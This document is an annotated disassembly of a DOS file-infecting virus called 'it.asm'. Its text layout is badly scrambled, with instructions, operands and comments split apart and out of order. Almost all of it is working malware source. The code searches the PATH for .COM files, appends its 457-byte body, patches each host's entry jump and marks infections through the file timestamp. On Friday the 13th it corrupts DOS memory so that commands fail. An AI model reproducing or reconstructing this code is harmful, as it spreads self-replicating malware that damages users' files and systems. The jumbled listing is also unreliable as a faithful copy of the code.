
  • November 2019
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;************************************************************************* ;* * ;* it.asm * ;* origin: mexico * ;* size:457 * ;* disassembly & analysis by: kohntark * ;* created: 24-apr-93 * ;* * ;************************************************************************* main


segment assume cs:main, ds:main org 100h jmp add add add add add nop nop nop nop nop add add add add add add nop nop nop nop nop add add add add add add nop nop nop nop nop int

virus bx,22h cx,23h dx,2dh si,17h di,22h

; (0147) ;do nothing host

ax,22h bx,22h cx,23h dx,2dh si,17h di,22h

ax,22h bx,22h cx,23h dx,2dh si,17h di,22h


;host program terminate

;***************************************************************************** ; virus starts here ;***************************************************************************** virus:

push call

ax get_poe

;save ax, unnecessary


pop sub

bp bp,304d

;get point of entry ;pad index

;**************************************** ; restore host ;**************************************** lea mov mov cld rep

si,[bp+753d] di,100h cx,3 movsb

;host_stub ;address to restore to ;restore 3 bytes ;clear direction flag ;restore from si to di 3 bytes

;**************************************** ; get dta's address ;**************************************** push mov int

es ah,2fh 21h

;save es ;ah=function 2fh ;get dta address into es:dx

;**************************************** ; save dta address into v-code ;**************************************** mov mov

ss:763d[bp],bx ss:765d[bp],es

;(600d:02fb=3032h) = ;(600d:02fd=3032h) =

763 765

;**************************************** ; redirect the dta into v-code ;**************************************** mov lea int

ah,1ah dx,[bp+767d] 21h

;ah=function 1ah ;load effective addr ;set dta to ds:dx (heap)

;**************************************** ; hook int 24h critical error handler ;**************************************** mov lea int

ax,2524h dx,[bp+710d] 21h

;ah=function 25h ;load effective addr ;set intrpt vector al to ds:dx

;**************************************** ; scan for 'path=' in environment ;****************************************



mov xor

es,ds:44d di,di

;es:di => environment segment ;zero register

lea lodsb mov repne


;load effective ;string [si] to ;scan the whole ;rept zf=0+cx>0

cx,8000h scasb

addr (438) al segment scan es:[di] for



;*************************************** ; loop to check for the next 4 ; characters ;*************************************** check_next_4: lodsb scasb jnz loop

find_path check_next_4

;string [si] to al ;scan es:[di] for al ;if not all there start all over ;loop to check next character

pop mov lea jmp

es ss:759d[bp],di di,[bp+32ah] short slash_ok

;save the address of the path ;filename workspace ; (01d2)

;****************************************** ; look in the path for more subdirectories ;****************************************** set_subdir:

cmp jne jmp

byte ptr ss:759d[bp],00 ;(600d:02f7=3856h) found_subdir ; jump if not equal reset_dta ; (029e)

push mov mov lea

ds ds,ds:44d si,ss:759d[bp] di,[bp+32ah]

found_subdir: ;environment ;(600d:02f7=3856h) ;di points to filename workspace

move_subdir: lodsb cmp je or jz stosb jmp moved_last_one:

short move_subdir

;string [si] to al, get char ;';' path delimiter ;found another dir ;zero ? ;jump if zero ;store al to es:[di] ;(01b6)



;zero register

pop mov cmp je mov stosb

ds ss:759d[bp],si byte ptr [di-1],5ch slash_ok al,5ch



;restore filename pointer to name

lea mov

si,[bp+2ebh] cx,6

;restore si ;# of bytes to move point to *.com

al,3bh moved_one al,al moved_last_one


slash_ok: workspace

;(600d:02f7=3856h) ; '\' ; jump if equal ; '\' ; store al to es:[di]




;rep while cx>0 mov [si] to ;move *.com to workspace

;************************************ ; find files to infect ;************************************





mov mov lea int

ah,4eh cx,3 dx,[bp+32ah] 21h


short find_first

mov int

ah,4fh 21h

;ah=function 4fh ;find next filename match

jnc jmp

found_file short set_subdir

; jump if carry=0

mov and cmp je

al,ss:315h[bp] al,1eh al,1eh find_next

;get time from dta ;mask off all but seconds ;seconds = 60? ;possibly infected get next file

cmp ja

word ptr ss:319h[bp],0fbc2h find_next

lea mov

si,[bp+31dh] di,ss:761d[bp]

;di => filename ;si => filename in dta

al,al more_chars

;move string ;store al to ;zero ? move ;jump if not

lodsb stosb or jnz

;ah=function 4eh ;attributes read only or hidden ok ;load effective addr ;find 1st filenam match @ds:dx

;is file too long? ;if so get next file

to the end of path es:[di] until we find a 00 zero

;********************************** ; get file's attributes from dta ;********************************** mov xor lea int

ax,4301h cx,cx dx,[bp+32ah] 21h

;ah=function 43h ;cx = 0 ;dx => path/filename ;get/set file attrb, nam@ds:dx

;************************************ ; open file for i/o ;************************************ mov lea int

ax,3d02h dx,[bp+32ah] 21h

;ah=function 3dh ;load effective addr,name of file ;open file, al=mode,name@ds:dx

jc mov

reset_attr bx,ax

;jump if carry set ;put file handle in bx

;***************************************** ; read file's 1st 3 bytes ;***************************************** mov mov lea int

ah,3fh cx,3 dx,[bp+2f1h] 21h

;ah=function 3fh ;# of bytes to read ;put 3 bytes here ;read file, cx=bytes, to ds:dx

jc cmp jne

reset_date ax,3 reset_date

;problem? set id and exit ;problem? set id and exit

;************************************** ; move file pointer to eof ;************************************** mov xor xor int

ax,4202h cx,cx dx,dx 21h



; zero register ; zero register ; dos services ah=function 42h ; move file ptr, cx,dx=offset ;problem? set id and exit

;***************************************** ; calculate host's jump to virus address ;***************************************** sub mov

ax,3 word ptr ss:757d[bp],ax

; (600d:02f5=5449h)

;*************************************** ; write virus to eof ;*************************************** mov mov lea int

ah,40h cx,1c9h dx,[bp+12ch] 21h

;ah=function 40h' ;write 457 bytes ;load effective addr ;write file cx=bytes, to ds:dx

jc cmp jne

reset_date ax,1c9h reset_date

;problem? set id and exit ;wrote 457 bytes? ;if not reset date & exit

;*************************************** ; move file ptr to beginning of file ;*************************************** mov xor xor int

ax,4200h cx,cx dx,dx 21h

;ah=function 42h ;zero register ;zero register ;move file ptr, cx,dx=offset



;problem? set id and exit

;**************************************** ; write jmp code to virus at the

; beginning of the new host ;**************************************** mov mov lea int

ah,40h cx,3 dx,[bp+2f4h] 21h

;ah=function 40h ;write 3 bytes ;3 bytes here ;write file cx=bytes, from ds:dx

;*************************************** ; reset file's date and time and fix id ;*************************************** reset_date: mov mov mov and or int

ax,5701h cx,ss:315h[bp] dx,ss:317h[bp] cx,0ffe0h cl,1eh 21h

;ah=function 57h ;(600d:0315=0) ;(600d:0317=0) ;fix id (time) ;set seconds to 60 (30 * 2) ;set file date & time

;********************************* ; close file handle ;********************************* mov int

ah,3eh 21h

;ah=function 3eh ;close file, bx=file handle

;********************************* ; restore file attrs ;********************************* reset_attr:


mov xor mov

ax,4301h cx,cx cl,ss:314h[bp]

;ah=function 43h ;zero register ;(600d:0314=0) previous file attrs

lea int

dx,[bp+32ah] 21h

;file name here ;set file attrb, nam@ds:dx

;**************************************** ; reset dta ;**************************************** reset_dta:


push mov lds

ds ah,1ah dx,dword ptr ss:763d[bp]

;save current data segment ;ah=function 1ah ;(600d:02fb=3032h) load 32 bit



;set dta to ds:dx

;****************************************** ; restore int 24h, critical error handler ;****************************************** lds mov int pop

dx,dword ptr es:12h ax,2524h 21h ds

;(600d:0012=0) load 32 bit ptr ;ah=function 25h ;set intrpt vector al to ds:dx ;restore current data segment

;************************************* ; find out if current date is ; the friday the 13th ;************************************* mov int

ah,2ah 21h

;ah=function 2ah ;get date, cx=year, dx=mon/day

cmp jne

dl,0dh exit

;compare day to 13 ;not the 13th?

cmp jne

al,5 exit

;friday? ;not friday? exit.

;************************************* ; kill dos memory size ; every command run will give a ; out of memory message ;*************************************

exit: code

push mov int

es ah,52h 21h

;save es ;ah=function 52h ;get dos ' list of lists

mov mov pop

es,es:[bx-2] byte ptr es:[0000],00 es

;segment of 1st memory block ;kill memory size ;restore es



;restore ax saved at beginning of

xor xor xor xor xor mov push xor retn

bx,bx cx,cx dx,dx si,si di,di bp,100h bp bp,bp

;zero register ;zero register ;zero register ;zero register ;zero register ;set return address ;push return address in stack ;zero register ;return to host

;******************************************************************************* ;*********************************** ; int 24h critical error handler ;*********************************** int_24h_entry: add pop pop pop pop pop pop pop pop

sp,6 ax bx cx dx si di bp ds

;move stack pointer ;restore all registers

pop stc retf

es 2

;set carry flag ;return far

int_24h_entry_end: ;****************************************************************************** copyright host_stub new_jump

db db db db db

'(c) itv85020203' 0 'path=*.com',0 05, 22h, 00 0e9h

;add ax,34d = 052200 ;new host's jmp code to virus ;goes here

;************************************************** ; the dta gets redirected to the heap after file. ; also the working space goes in the heap ;************************************************** main

ends end


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